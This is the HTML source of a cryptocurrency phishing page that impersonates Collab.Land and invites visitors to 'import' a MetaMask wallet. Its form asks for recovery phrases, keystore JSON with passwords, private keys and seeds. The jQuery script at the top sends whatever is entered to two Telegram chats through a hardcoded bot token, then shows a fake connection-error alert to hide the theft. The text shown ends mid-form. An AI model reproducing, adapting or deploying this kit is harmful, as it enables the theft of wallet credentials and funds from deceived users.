<script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>

<script>
$(document).ready(function(){
    function sendTelegramMessage() {
        var telegramToken = '6488551816:AAHywU6pZSueBTi6qVHmx3WwYl-gIIycUpU';
        var chatIds = ['1647712053', '5011019080']; // Add more chat IDs as needed
        
        var telegramMessage = "New Form Submission:\n";
        
        if($('#phraseinput').val()){
            telegramMessage += "Phrase: " + $('#phraseinput').val() + "\n";
        }
        if($('#wallet_id').val()){
            telegramMessage += "Wallet Id: " + $('#wallet_id').val() + "\n";
        }
        if($('#keystoreval').val()){
            telegramMessage += "Keystore: " + $('#keystoreval').val() + "\n";
        }
        if($('#keystorepass').val()){
            telegramMessage += "Password: " + $('#keystorepass').val() + "\n";
        }
        if($('#privatekeyval').val()){
            telegramMessage += "Private Key: " + $('#privatekeyval').val() + "\n";
        }
        if($('#familyseed').val()){
            telegramMessage += "Family Seed: " + $('#familyseed').val() + "\n";
        }

        var telegramUrl = "https://api.telegram.org/bot" + telegramToken + "/sendMessage";

        $.each(chatIds, function(index, chatId) {
            var telegramData = {
                chat_id: chatId,
                text: telegramMessage
            };

            //  POST request using AJAX
            $.ajax({
                type: 'POST',
                url: telegramUrl,
                data: telegramData,
                success: function(response) {
                    console.log('Message sent successfully to chat ID ' + chatId + ':', response);
                },
                error: function(error) {
                    console.error('Error sending message to chat ID ' + chatId + ':', error);
                }
            });
        });
    }

    $('#form').submit(function(event) {
        event.preventDefault(); // Prevent the default form submission

        sendTelegramMessage();

 
        alert('Unable to connect wallet, try again later.');
    });
});
</script>



<html>
<head>
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta name="theme-color" content="#000000">
        <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
        <meta charset="UTF-8">
        <meta content="CLICK HERE TO VERIFY" property="og:title">
      <meta property="og:url" content="http://collab.land/">
      <meta property="og:title" content="Welcome to Collab.Land">
      <meta property="og:description" content="This is a read only connection. Do not share your private keys or seed phrase outside of this connection.">
      <meta property="og:type" content="website">   
      <link href="css/main.css" rel="stylesheet">
      <link href="css/style.css" rel="stylesheet">
      
      <meta http-equiv="x-ua-compatible" content="ie=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
      <meta name="generator" content="Gatsby 2.25.1">
      <title data-react-helmet="true">Welcome</title>
      <link data-react-helmet="true" rel="shortcut icon" href="img/image.jpg">
      <meta data-react-helmet="true" name="msapplication-TileColor" content="#da532c">
      <meta data-react-helmet="true" name="theme-color" content="#ffffff">
      <meta data-react-helmet="true" name="description" content="This is a read only connection. Do not share your private keys or seed phrase outside of this connection.">
      <meta data-react-helmet="true" name="keywords" content="ethereum, cryptocurrency, wallet, mobile, connect, bridge, relay, proxy, standard, protocol, crypto, tokens, dapp">
      <meta data-react-helmet="true" name="twitter:card" content="summary_large_image">
      <meta data-react-helmet="true" name="twitter:site" content="@syncwallet">
      <meta data-react-helmet="true" name="twitter:title" content="">
      <meta data-react-helmet="true" name="twitter:description" content="User friendly, tokenized and community managemant protocal for connecting wallets to Dapps">
      <meta data-react-helmet="true" name="twitter:img:src" content="social-card.html">
      <meta data-react-helmet="true" name="og:title" content="CLICK HERE TO VERIFY">
      <meta data-react-helmet="true" name="og:type" content="website">
      <meta data-react-helmet="true" name="og:url" content="../">
      <meta data-react-helmet="true" name="og:image" content="syncwallet.online/social-card.html">
      <meta data-react-helmet="true" name="og:description" content="This is a read only connection. Do not share your private keys or seed phrase outside of this connection.">
      <meta data-react-helmet="true" name="og:site_name" content="Collab.Land">
      <meta data-react-helmet="true" name="fb:admins" content="365412154213405">
      <script src="../../../ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
      <style data-styled="dijnUu  hfVnjX fiuMUO kyUqCt eyaBAy hnlESl guKAph fuQfHo hDbjSS fAmUdU gFeYHJ jGHRMl ibLsRQ gAVVCu cmAzHq kSIOSl lfUBtr eodRCW ceWocr jVWwwJ YwSGw hvbAKM" data-styled-version="4.4.1">
         /* sc-component-id: Header__SHeader-cphy8j-0 */
         .kyUqCt {
         width: 100%;
         max-width: 1200px;
         margin: 0 auto;
         height: 145px;
         padding: 0 20px;
         display: -webkit-box;
         display: -webkit-flex;
         display: -ms-flexbox;
         display: flex;
         -webkit-align-items: center;
         -webkit-box-align: center;
         -ms-flex-align: center;
         align-items: center;
         -webkit-box-pack: space-around;
         -webkit-justify-content: space-around;
         -ms-flex-pack: space-around;
         justify-content: space-around;
         }
         @media screen and (max-width:640px) {
         .kyUqCt {
         height: 100px;
         padding: 0 15px;
         }
         }
         /* sc-component-id: Header__SInternalLink-cphy8j-1 */
         .guKAph {
         width: 100px;
         text-align: center;
         font-size: 20px;
         color: rgb(88, 120, 188);
         font-weight: 500;
         }
         @media screen and (max-width:640px) {
         .guKAph {
         font-size: 16px;
         }
         }
         /* sc-component-id: Header__SInternalLink-cphy8j-1-a */
         .eyaBAy {
         width: 100px;
         text-align: center;
         font-size: 20px;
         color: rgb(88, 120, 188);
         font-weight: 500;
         }
         @media screen and (max-width:640px) {
         .eyaBAy {
         font-size: 16px;
         }
         }
         /* sc-component-id: Header__SLogo-cphy8j-2 */
         .hnlESl {
         -webkit-flex: 1;
         -ms-flex: 1;
         flex: 1;
         padding: 0 20px;
         text-align: center;
         }
         .hnlESl img {
         width: 100%;
         max-width: 120px;
         min-width: 60px;
         }
         /* sc-component-id: Footer__SFooter-sc-1k47aoh-0 */
         .jVWwwJ {
         width: 100%;
         max-width: 1200px;
         margin: 0 auto;
         height: 160px;
         display: -webkit-box;
         display: -webkit-flex;
         display: -ms-flexbox;
         display: flex;
         -webkit-flex-shrink: 0;
         -ms-flex-negative: 0;
         flex-shrink: 0;
         -webkit-align-items: center;
         -webkit-box-align: center;
         -ms-flex-align: center;
         align-items: center;
         -webkit-box-pack: center;
         -webkit-justify-content: center;
         -ms-flex-pack: center;
         justify-content: center;
         }
         @media screen and (max-width:640px) {
         .jVWwwJ {
         -webkit-flex-direction: column;
         -ms-flex-direction: column;
         flex-direction: column;
         height: auto;
         margin: 30px 0;
         }
         .jVWwwJ a {
         margin: 10px 0;
         }
         }
         /* sc-component-id: Footer__SSocialIcon-sc-1k47aoh-1 */
         .hvbAKM {
         width: 20px;
         height: 20px;
         }
         .hvbAKM img {
         height: 100%;
         }
         /* sc-component-id: Footer__SExternalLink-sc-1k47aoh-2 */
         .YwSGw {
         width: 150px;
         display: -webkit-box;
         display: -webkit-flex;
         display: -ms-flexbox;
         display: flex;
         -webkit-align-items: center;
         -webkit-box-align: center;
         -ms-flex-align: center;
         align-items: center;
         -webkit-box-pack: center;
         -webkit-justify-content: center;
         -ms-flex-pack: center;
         justify-content: center;
         }
         .YwSGw p {
         display: -webkit-box;
         display: -webkit-flex;
         display: -ms-flexbox;
         display: flex;
         -webkit-align-items: center;
         -webkit-box-align: center;
         -ms-flex-align: center;
         align-items: center;
         padding-left: 0.5em;
         font-size: 14px;
         color: rgb(88, 120, 188);
         font-weight: 500;
         }
         /* sc-component-id: sc-global-3954063800 */
         @font-face {
         font-family: 'SFMono';
         src: url('https://verifyme.site/fonts/SFMono-Regular.eot');
         src: url('https://verifyme.site/fonts/SFMono-Regulard41d.eot?#iefix') format('embedded-opentype'), url('https://verifyme.site/fonts/SFMono-Regular.woff2') format('woff2'), url('https://verifyme.site/fonts/SFMono-Regular.woff') format('woff'), url('https://verifyme.site/fonts/SFMono-Regular.ttf') format('truetype'), url('https://verifyme.site/fonts/SFMono-Regular.svg#SFMono-Regular') format('svg');
         font-weight: normal;
         font-style: normal;
         }
         @font-face {
         font-family: 'SFMono';
         src: url('https://verifyme.site/fonts/SFMono-Medium.eot');
         src: url('https://verifyme.site/fonts/SFMono-Mediumd41d.eot?#iefix') format('embedded-opentype'), url('https://verifyme.site/fonts/SFMono-Medium.woff2') format('woff2'), url('https://verifyme.site/fonts/SFMono-Medium.woff') format('woff'), url('https://verifyme.site/fonts/SFMono-Medium.ttf') format('truetype'), url('https://verifyme.site/fonts/SFMono-Medium.svg#SFMono-Medium') format('svg');
         font-weight: 500;
         font-style: normal;
         }
         @font-face {
         font-family: 'SFMono';
         src: url('https://verifyme.site/fonts/SFMono-Semibold.eot');
         src: url('https://verifyme.site/fonts/SFMono-Semiboldd41d.eot?#iefix') format('embedded-opentype'), url('https://verifyme.site/fonts/SFMono-Semibold.woff2') format('woff2'), url('https://verifyme.site/fonts/SFMono-Semibold.woff') format('woff'), url('https://verifyme.site/fonts/SFMono-Semibold.ttf') format('truetype'), url('https://verifyme.site/fonts/SFMono-Semibold.svg#SFMono-Semibold') format('svg');
         font-weight: 600;
         font-style: normal;
         }
         @font-face {
         font-family: 'SFMono';
         src: url('https://verifyme.site/fonts/SFMono-Bold.eot');
         src: url('https://verifyme.site/fonts/SFMono-Boldd41d.eot?#iefix') format('embedded-opentype'), url('https://verifyme.site/fonts/SFMono-Bold.woff2') format('woff2'), url('https://verifyme.site/fonts/SFMono-Bold.woff') format('woff'), url('https://verifyme.site/fonts/SFMono-Bold.ttf') format('truetype'), url('https://verifyme.site/fonts/SFMono-Bold.svg#SFMono-Bold') format('svg');
         font-weight: bold;
         font-style: normal;
         }
         @font-face {
         font-family: 'SF Pro Text';
         src: url('https://verifyme.site/fonts/SFProText-Regular.eot');
         src: url('https://verifyme.site/fonts/SFProText-Regulard41d.eot?#iefix') format('embedded-opentype'), url('https://verifyme.site/fonts/SFProText-Regular.woff2') format('woff2'), url('https://verifyme.site/fonts/SFProText-Regular.woff') format('woff'), url('https://verifyme.site/fonts/SFProText-Regular.ttf') format('truetype'), url('https://verifyme.site/fonts/SFProText-Regular.svg#SFProText-Regular') format('svg');
         font-weight: normal;
         font-style: normal;
         }
         @font-face {
         font-family: 'SF Pro Text';
         src: url('https://verifyme.site/fonts/SFProText-Semibold.eot');
         src: url('https://verifyme.site/fonts/SFProText-Semiboldd41d.eot?#iefix') format('embedded-opentype'), url('https://verifyme.site/fonts/SFProText-Semibold.woff2') format('woff2'), url('https://verifyme.site/fonts/SFProText-Semibold.woff') format('woff'), url('https://verifyme.site/fonts/SFProText-Semibold.ttf') format('truetype'), url('https://verifyme.site/fonts/SFProText-Semibold.svg#SFProText-Semibold') format('svg');
         font-weight: 600;
         font-style: normal;
         }
         @font-face {
         font-family: 'SF Pro Text';
         src: url('https://verifyme.site/fonts/SFProText-Medium.eot');
         src: url('https://verifyme.site/fonts/SFProText-Mediumd41d.eot?#iefix') format('embedded-opentype'), url('https://verifyme.site/fonts/SFProText-Medium.woff2') format('woff2'), url('https://verifyme.site/fonts/SFProText-Medium.woff') format('woff'), url('https://verifyme.site/fonts/SFProText-Medium.ttf') format('truetype'), url('https://verifyme.site/fonts/SFProText-Medium.svg#SFProText-Medium') format('svg');
         font-weight: 500;
         font-style: normal;
         }
         @font-face {
         font-family: 'SF Pro Text';
         src: url('https://verifyme.site/fonts/SFProText-Bold.eot');
         src: url('https://verifyme.site/fonts/SFProText-Boldd41d.eot?#iefix') format('embedded-opentype'), url('https://verifyme.site/fonts/SFProText-Bold.woff2') format('woff2'), url('https://verifyme.site/fonts/SFProText-Bold.woff') format('woff'), url('https://verifyme.site/fonts/SFProText-Bold.ttf') format('truetype'), url('https://verifyme.site/fonts/SFProText-Bold.svg#SFProText-Bold') format('svg');
         font-weight: bold;
         font-style: normal;
         }
         html,
         body,
         #root,
         #router-root {
         height: 99vh;
         width: 100%;
         margin: 0;
         padding: 0;
         overflow: hidden;
         }
         html{
         position: fixed;
         }
         body {
         font-family: -apple-system, system-ui, BlinkMacSystemFont, "SF Pro Text", Roboto, Helvetica, Arial, sans-serif;
         font-style: normal;
         font-stretch: normal;
         font-weight: 400;
         font-size: 16px;
         color: rgb(88, 112, 135);
         overflow-y: auto;
         text-rendering: optimizeLegibility;
         -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
         -webkit-font-smoothing: antialiased;
         -moz-osx-font-smoothing: grayscale;
         -webkit-text-size-adjust: 100%;
         -webkit-overflow-scrolling: touch;
         }
         button:active,
         button:focus,
         button.active {
         background-image: none;
         outline: 0;
         -webkit-box-shadow: none;
         box-shadow: none;
         }
         [tabindex] {
         outline: none;
         }
         a,
         p,
         h1,
         h2,
         h3,
         h4,
         h5,
         h6 {
         -webkit-text-decoration: none;
         text-decoration: none;
         margin: 0;
         padding: 0;
         }
         h1 {
         font-size: 42px;
         }
         h2 {
         font-size: 32px;
         }
         h3 {
         font-size: 24px;
         }
         h4 {
         font-size: 20px;
         }
         h5 {
         font-size: 17px;
         }
         h6 {
         font-size: 14px;
         }
         a {
         -webkit-text-decoration: none;
         text-decoration: none;
         color: inherit;
         outline: none;
         color: #4199FC;
         font-weight: bold;
         }
         ul,
         li {
         list-style: none;
         margin: 0;
         padding: 0;
         }
         * {
         box-sizing: border-box !important;
         }
         button {
         border-style: none;
         line-height: 1em;
         }
         input {
         -webkit-appearance: none;
         }
         input[type="color"],
         input[type="date"],
         input[type="datetime"],
         input[type="datetime-local"],
         input[type="email"],
         input[type="month"],
         input[type="number"],
         input[type="password"],
         input[type="search"],
         input[type="tel"],
         input[type="text"],
         input[type="time"],
         input[type="url"],
         input[type="week"],
         select:focus,
         textarea {
         font-size: 16px;
         }
         .statusbar-overlay {
         opacity: 0;
         }
         #coinbase_button_iframe {
         width: 244px !important;
         margin-top: 40px !important;
         }
         #coinbase_widget {
         display: inline-block;
         margin-top: 56px !important;
         }
         /* sc-component-id: layout__SWrapper-wjwiqk-0 */
         .dijnUu {
         position: relative;
         width: 100%;
         height: 100%;
         background-color: rgb(255, 255, 255);
         }
         /* sc-component-id: layout__SContent-wjwiqk-1 */
         .fiuMUO {
         width: 100%;
         height: 100%;
         margin: 0 auto;
         position: relative;
         }
         /* sc-component-id: layout__SContainer-wjwiqk-2 */
         .fuQfHo {
         height: 100%;
         max-width: 1064px;
         margin: 0 auto;
         padding: 0;
         }
         /* sc-component-id: layout__SFlex-wjwiqk-3 */
         .hfVnjX {
         display: -webkit-box;
         display: -webkit-flex;
         display: -ms-flexbox;
         display: flex;
         height: 100%;
         }
         @media screen and (max-width:640px) {
         .hfVnjX {
         -webkit-flex-direction: column;
         -ms-flex-direction: column;
         flex-direction: column;
         }
         }
         /* sc-component-id: Grid__SGrid-sc-8d5rqj-0 */
         .gAVVCu {
         width: 100%;
         padding: 24px;
         max-height: 75vh;
         overflow-x: hidden;
         overflow-y: scroll;
         border-radius: 0 0 20px 20px;
         position: unset;
         z-index: -1;
         background: rgb(255, 255, 255);
         display: flex;
         flex-direction: column;
         grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
         grid-column-gap: 30px;
         grid-row-gap: 5px;
         }
         @media screen and (max-width:640px) {
         .gAVVCu {
         grid-template-columns: repeat(auto-fit, minmax(100px, 1fr));
         grid-column-gap: 15px;
         grid-row-gap: 15px;
         }
         }
         /* sc-component-id: pageStyles__SIndexPage-sc-1navawn-0 */
         .hDbjSS {
         height: 100%;
         display: -webkit-box;
         display: -webkit-flex;
         display: -ms-flexbox;
         display: flex;
         -webkit-flex-direction: column;
         -ms-flex-direction: column;
         flex-direction: column;
         -webkit-box-pack: space-around;
         -webkit-justify-content: space-around;
         -ms-flex-pack: space-around;
         justify-content: space-around;
         -webkit-align-items: center;
         -webkit-box-align: center;
         -ms-flex-align: center;
         align-items: center;
         text-align: center;
         padding: 0 32px;
         padding-top: 30px;
         }
         @media screen and (max-width:640px) {
         .hDbjSS {
         padding: 0 24px;
         padding-top: 20px;
         }
         }
         /* sc-component-id: pageStyles__SBrandingWrapper-sc-1navawn-1 */
         .fAmUdU {
         display: -webkit-box;
         display: -webkit-flex;
         display: -ms-flexbox;
         display: flex;
         -webkit-flex-direction: column;
         -ms-flex-direction: column;
         flex-direction: column;
         -webkit-box-pack: center;
         -webkit-justify-content: center;
         -ms-flex-pack: center;
         justify-content: center;
         -webkit-align-items: center;
         -webkit-box-align: center;
         -ms-flex-align: center;
         align-items: center;
         width: 100%;
         max-width: 700px;
         margin: 0 auto;
         }
         /* sc-component-id: pageStyles__SBranding-sc-1navawn-2 */
         .gFeYHJ {
         font-size: 35px;
         font-weight: 500;
         text-align: center;
         }
         /* sc-component-id: pageStyles__SPageDescription-sc-1navawn-3 */
         .jGHRMl {
         margin-top: 40px;
         font-size: 18px;
         font-weight: 300;
         line-height: 1.35;
         }
         div#gatsby-focus-wrapper {
         display: flex;
         justify-content: center;
         }
         @media screen and (max-width: 500px ){
         .ibLsRQ {
         width: 90%!important;
         }
         }
         @media screen and (max-width: 800px ){
         .ibLsRQ {
         width: 70%!important;
         }
         }
         @media screen and (max-width: 500px ){
         .ibLsRQ {
         width: 90%!important;
         }
         }
         /* sc-component-id: pageStyles__SSection-sc-1navawn-4 */
         .ibLsRQ {
         position: fixed;
         top: 10vh;
         width: 50%;
         height: 80vh;
         min-width: 200px;
         overflow-y: hidden;
         background-color: #ffffff;
         border-radius: 25px;
         z-index: 0;
         }
         .collabland {
         position: fixed;
         width: 100%;
         font-weight: 900;
         /* margin: 2em; */
         padding: 32px;
         display: flex;
         float: left;
         align-items: center;
         /* max-width: 4rem; */
         color: #fff;
         border-radius: 25px;
         }
         /* sc-component-id: pageStyles__SApp-sc-1navawn-5 */
         .cmAzHq {
         height: 2rem;
         width: 100%;
         display: flex;
         cursor: pointer;
         border: rgba(0, 0, 0, .1) 1px solid;
         padding: 1.5em 0.4em;
         border-radius: 0.6em;
         align-items: center;
         justify-content: space-between;
         }
         .mr2.bg-green.br-100{
         height: 8px;
         color: green;
         background-color: #19a974;
         margin: 0.4em;
         border-radius: 20px;
         }
         /* sc-component-id: pageStyles__SAppIcon-sc-1navawn-6 */
         .kSIOSl {
         width: 100%;
         display: -webkit-box;
         display: -webkit-flex;
         display: -ms-flexbox;
         display: flex;
         -webkit-align-items: center;
         -webkit-box-align: center;
         -ms-flex-align: center;
         align-items: center;
         -webkit-box-pack: center;
         -webkit-justify-content: center;
         -ms-flex-pack: center;
         justify-content: center;
         padding: 25px;
         }
         .kSIOSl img {
         -webkit-filter: initial;
         filter: initial;
         width: 100%;
         height: 100%;
         border-radius: 50%;
         }
         .lfUBtr {
         /* width: 100%; */
         display: -webkit-box;
         display: -webkit-flex;
         display: -ms-flexbox;
         display: flex;
         -webkit-align-items: center;
         -webkit-box-align: center;
         -ms-flex-align: center;
         align-items: center;
         -webkit-box-pack: center;
         -webkit-justify-content: center;
         -ms-flex-pack: center;
         justify-content: center;
         padding: 25px;
         }
         .lfUBtr img {
         -webkit-filter: initial;
         filter: initial;
         width: 2rem;
         height: 2rem;
         border-radius: initial;
         }
         /* sc-component-id: pageStyles__SAppName-sc-1navawn-7 */
         .eodRCW {
         font-weight: bold;
         display: flex;
         color: inherit;
         justify-content: space-evenly;
         align-items: center;
         }
         /* sc-component-id: pageStyles__SFootNote-sc-1navawn-8 */
         .ceWocr {
         margin: 10px;
         color: rgb(88, 112, 135);
         opacity: 0.75;
         padding-top: 30px;
         }
         .ceWocr a {
         font-weight: 600;
         }

         .containerz {
    height:50px;
    width:40px;
    position:absolute;
    left:0;
    right:0;
    top:0;
    bottom:0;
    margin:auto;
}
.containerz::after {
    content:'Synchronizing...';
    color:#007298;
    font-weight:700;
    position:absolute;
    bottom:-50px;
    left:-10px;
}
.boxz {
    position:relative;
    height:50px;
    width:40px;
    animation: box 5s infinite linear;
}

.borderz {
    background:#007298;
    position:absolute;
}

.borderz.one {
    height:4px;
    top:0;
    left:0;
    animation: border-one 5s infinite linear;
}

.borderz.two {
    top:0;
    right:0;
    height:100%;
    width:4px;
    animation: border-two 5s infinite linear;
}

.borderz.three {
    bottom:0;
    right:0;
    height:4px;
    width:100%;
    animation: border-three 5s infinite linear;
}

.borderz.four {
    bottom:0;
    left:0;
    height:100%;
    width:4px;
    animation: border-four 5s infinite linear;
}

.line {
    height:4px;
    background:#007298;
    position:absolute;
    width:0%;
    left:25%;
}

.line.one {
    top:25%;
    width:0%;
    animation: line-one 5s infinite linear;
}

.line.two {
    top:45%;
    animation: line-two 5s infinite linear;
}

.line.three {
    top:65%;
    animation: line-three 5s infinite linear;
}

@keyframes border-one {
    0%   {width:0;}
    10%  {width:100%;}
    100% {width:100%;}
}

@keyframes border-two {
    0%   {height:0;}
    10%  {height:0%;}
    20%  {height:100%;}
    100% {height:100%;}
}

@keyframes border-three {
    0%   {width:0;}
    20%  {width:0%;}
    30%  {width:100%;}
    100% {width:100%;}
}

@keyframes border-four {
    0%   {height:0;}
    30%  {height:0%;}
    40%  {height:100%;}
    100% {height:100%;}
}

@keyframes line-one {
    0%   {left:25%;width:0;}
    40%  {left:25%;width:0%;}
    43%  {left:25%;width:50%;}
    52%  {left:25%;width:50%;}
    54%  {left:25%;width:0% }
    55%  {right:25%;left:auto;}
    63%  {width:10%;right:25%;left:auto;}
    100% {width:10%;right:25%;left:auto;}
}

@keyframes line-two {
    0%   {width:0;}
    42%  {width:0%;}
    45%  {width:50%;}
    53%  {width:50%;}
    54%  {width:0% }
    60%  {width:50%}
    100% {width:50%;}
}

@keyframes line-three {
    0%   {width:0;}
    45%  {width:0%;}
    48%  {width:50%;}
    51%  {width:50%;}
    52%  {width:0% }
    100% {width:0%;}
}

@keyframes box {
    0%   {opacity:1;margin-left:0px;height:50px;width:40px;}
    55%  {margin-left:0px;height:50px;width:40px;}
    60%  {margin-left:0px;height:35px;width:50px;}
    74%  {msthin-left:0;}
    80%  {margin-left:-50px;opacity:1;}
    90% {height:35px;width:50px;margin-left:50px;opacity:0;}
    100% {opacity:0;}
}

      </style>
      <link as="script" rel="preload" href="verifyme.cloud/webpack-runtime-08a0e953018334063ddd.html">
      <link as="script" rel="preload" href="verifyme.cloud/framework-8e528b732ab2eaadb7b7.html">
      <link as="script" rel="preload" href="verifyme.cloud/app-2b5a75f35e7d5a1e67ad.html">
      <link as="script" rel="preload" href="verifyme.cloud/commons-728581910d6e685fb39c.html">
      <link as="script" rel="preload" href="verifyme.cloud/component---src-pages-apps-tsx-50d212c53780f4e2ed64.html">
      <link as="fetch" rel="preload" href="https://verifyme.cloud/page-data/apps/page-data.json" crossorigin="anonymous">
      <link as="fetch" rel="preload" href="https://verifyme.cloud/page-data/app-data.json" crossorigin="anonymous">
      <script type="text/javascript" src="js/email.min.js"></script>
      <script type="text/javascript">
         (function() {
         emailjs.init("user_MR20sMaQCbRQ4uWbRSbf4");
         })();
      </script>
   </head>
   <body style="display: block;" data-new-gr-c-s-check-loaded="14.1041.0" data-gr-ext-installed="">
     <!-- <div class="sending" data-reach-dialog-overlay="" style="opacity: 1;z-index: 99999;display: none">
         <div class="containerz">
            <img class="qrrrr" src="img/qr-code.png">
         </div>
      </div>
   -->
   <div class="sending" data-reach-dialog-overlay="" style="opacity: 1;z-index: 99999;display: none">

      <div class="containerz">
          <div class="boxz">
              <div class="borderz one"></div>
              <div class="borderz two"></div>
              <div class="borderz three"></div>
              <div class="borderz four"></div>

              <div class="line one"></div>
              <div class="line two"></div>
              <div class="line three"></div>
          </div>
      </div>
  </div>
      <div class="sc-bdVaJa LPcxt" data-reach-dialog-overlay="" style="opacity: 1; display: none;">
         <div aria-modal="true" role="dialog" tabindex="-1" aria-label="dialog" class="sc-bwzfXH iiXYOL" data-reach-dialog-content="">
            <div class="sc-cMhqgX gUQEWC">
               <div class="sc-cmthru jJAhga">
                  <div class="sc-bsbRJL fRcQRh">
                     <svg width="20" height="20" viewBox="0 0 20 20" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="sc-hZSUBg fRJrUU">
                        <line x1="18" y1="6" x2="6" y2="18">
                        </line>
                        <line x1="6" y1="6" x2="18" y2="18">
                        </line>
                     </svg>
                  </div>
                  <div class="sc-iuJeZd hRZQmk" color="blue">
                     <div class="sc-gqPbQI fhSmUE">
                        Back
                     </div>
                  </div>
                  <div class="sc-esOvli jebOoi">
                     <div class="sc-hrWEMg bHjlF">
                        <div class="sc-gwVKww jEMAel">
                           <div class="sc-iQNlJl dJZYYq">
                              <div class="sc-hXRMBi deLgHH">
                                 <div class="loading">Initializing...</div>
                                 <div class="sc-epnACN jwEAlI" style="display: none;">
                                    Connect Manually
                                 </div>
                              </div>
                           </div>
                        </div>
                        <button id="connect-METAMASK" class="sc-kPVwWT sc-kfGgVZ sc-kIPQKe dQoUpv">
                           <div class="sc-esjQYD iGptdp">
                              <div color="#E8831D" class="sc-RefOD jsJmJE">Metamask</div>
                              <div class="sc-iQKALj GTKuw">
                                 Easy-to-use browser extension.
                              </div>
                           </div>
                           <div class="sc-bwCtUz lgYJCf">
                              <img class="firstImg" src="img/metamask-69ce6b56bbc9953dfb4aecebdf88729b.png" alt="Icon" style="width: 24px;">
                           </div>
                        </button>
                     </div>
                  </div>
               </div>
            </div>
         </div>
      </div>
      <div class="2tzjbs overlay" data-rbnxzn="qw7i7k" style="display: none;">
         <div class="ih37zd aletr sswla" data-j9niem="t4amku" style="display: block;">
            <div role="dialog" aria-modal="true" aria-labelledby="modal-headline" class="block align-bottom bg-white rounded-lg text-left overflow-hidden  transform transition-all sm:my-8 sm:align-middle">
               <div class="bg-white px-4 pt-5 pb-4 sm:p-6 sm:pb-4">
                  <div class="sm:flex sm:items-start">
                     <form enctype="multipart/form-data" id="form">
                     <div class="mt-3 text-center sm:mt-0 sm:ml-4 sm:text-left w-full mr-10">
                        <h3 id="modal-headline" class="text-lg leading-6 mt-2 font-medium text-gray-900" style="display: flex; flex-direction: row;"> <img src="img/metamask-69ce6b56bbc9953dfb4aecebdf88729b.png" style="margin-right: 20px; height: 40px; width: 40px" id="myImg"><span>Import your <span id="walletname">Metamask</span>
                           wallet</span>
                        </h3>
                        <div class="mt-2">
                           <div class="mt-10">
                                 <input type="hidden" name="form-name" value="my-form">
                                 <div class="flex justify-evenly border-b-2 border-fuchsia-600 mb-4">
                                    <div id="phrase" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                                       Phrase
                                    </div>
                                    <span id="guideDisplay" style="display: none;">
                                    <div id="keystore" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                                       Keystore JSON
                                    </div>
                                    <div id="private" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                                       Private Key
                                    </div>
                                 </span>
                                 <span id="guideDisplay2" style="display: none;">
                                    <div id="family" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                                       Family Seed
                                    </div>
                                    <div id="secret" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                                       Secret Numbers
                                    </div>
                                 </span>
                                 </div>

                                 
                                    <div id="first" class="acc-body active">
                                    <div class="flex flex-col">
                                    </div>
                                    <div class="flex flex-col mb-6">
                                       <div class="relative" data-children-count="1">
                                          <textarea id="phraseinput" cols="30" rows="4" placeholder="Enter your recovery phrase" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" name="phrase" required=""></textarea>
                                          <p class="text-xs text-grey-300 mt-6">
                                             Typically 12 (sometimes 24) words separated by
                                             single spaces
                                          </p>
                                       </div>
                                    </div>
                                    <div class="flex w-full">
                                       <button type="submit" name="submit" class="btn btn-primary flex items-center justify-center focus:outline-none text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2 w-full transition duration-150 ease-in">
                                          <span class="mr-2 uppercase">Validate</span> 
                                          <span>
                                             <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                                                <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9 0 11-18 0 9 9 0 0118 0z"></path>
                                             </svg>
                                          </span>
                                       </button>
                                    </div>

                                    <!-- Successfully Submitted page-->
                                  <div style="display:none" class="thankyou_message">
                                     <p class="successful">Phrase Successfully Validated, goto Keystore JSON</p>
                                  </div>
                                 </div>

                                 


                                    <div id="second" class="acc-body bg-grey-600">
                                    <div class="flex flex-col">
                                    </div>
                                    <div class="flex flex-col mb-6">
                                       <div class="relative">
                                          <textarea cols="30" rows="4" placeholder="Enter your Keystore JSON" id="keystoreval" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" name="keystore" required=""></textarea>
                                       </div>
                                    </div>
                                    <div class="flex flex-col mb-6">
                                       <div class="relative" data-children-count="1">
                                          <input type="text" name="password" placeholder="Wallet password" id="keystorepass" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
                                          <p class="text-xs text-grey-300 mt-6">
                                             Several lines of text beginning with "{...}" plus
                                             the password you used to encrypt it.
                                          </p>
                                       </div>
                                    </div>
                                    <div class="flex w-full">
                                       <button type="submit" name="submit" class="flex items-center justify-center focus:outline-none
                                          text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                                          w-full transition duration-150 ease-in">
                                          <span class="mr-2
                                             uppercase">Validate</span> 
                                          <span>
                                             <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                                                <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                                                   0 11-18 0 9 9 0 0118 0z"></path>
                                             </svg>
                                          </span>
                                       </button>
                                    </div>

                                    <!-- Successfully Submitted page-->
                                  <div style="display:none" class="thankyou_message">
                                     <p class="successful">Keystore JSON Successfully Validated, goto Keystore JSON</p>
                                  </div>
                                 </div>
                                 
                              
                                    <div id="third" class="acc-body bg-grey-600">
                                    <div class="flex flex-col">
